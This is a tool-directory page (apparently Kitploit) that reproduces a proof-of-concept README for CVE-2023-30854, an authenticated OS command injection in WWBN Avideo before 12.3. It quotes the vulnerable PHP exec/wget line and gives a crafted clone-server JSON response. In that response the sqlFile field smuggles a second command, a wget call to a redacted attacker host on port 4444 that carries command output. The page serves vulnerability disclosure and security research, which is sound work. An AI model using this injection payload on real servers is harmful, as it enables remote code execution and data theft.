Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-30854 — Proof-of-concept exploit for CVE-2023-30854: authenticated OS command injection in WWBN Avideo < 12.3, enabling remote code execution via crafted clone server response. | Kitploit
Tools/GitHubGitHub/jmrcsnchz/cve-2023-30854
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubjmrcsnchz/cve-2023-30854

CVE-2023-30854

Proof-of-concept exploit for CVE-2023-30854: authenticated OS command injection in WWBN Avideo < 12.3, enabling remote code execution via crafted clone server response.

View Repository
1123 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

WWBN Avideo Authenticated RCE - OS Command Injection

CVE-2023-30854 WWBN Avideo < 12.3 Authenticated RCE

An OS Command Injection vulnerability in an Authenticated endpoint /plugin/CloneSite/cloneClient.json.php allows attackers to achieve Remote Code Execution.

Vulnerable code:

root@kitploit:~
$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);

We can control $objClone->cloneSiteURL through the admin panel clone site feature.

/plugin/CloneSite/cloneClient.json.php sends a GET Request to {$objClone->cloneSiteURL}/plugin/CloneSite/cloneServer.json.php. I hosted a specially crafted cloneServer.json.php that prints the following JSON data

root@kitploit:~
{"error":false,"msg":"","url":"https:\/\/REDACTED/\/","key":"REDACTED","useRsync":1,"videosDir":"\/var\/www\/html\/demo.avideo.com\/videos\/","sqlFile":"Clone_mysqlDump_644ab263e62d6.sql; wget http://REDACTED:4444/`pwd` ;#","videoFiles":[],"photoFiles":[]}

Send a GET Request to /plugin/CloneSite/cloneClient.json.php then remote code execution is achieved.

rce

Credits

  • JM Sanchez
  • https://www.linkedin.com/in/juanmarcosanchez/
Download Tool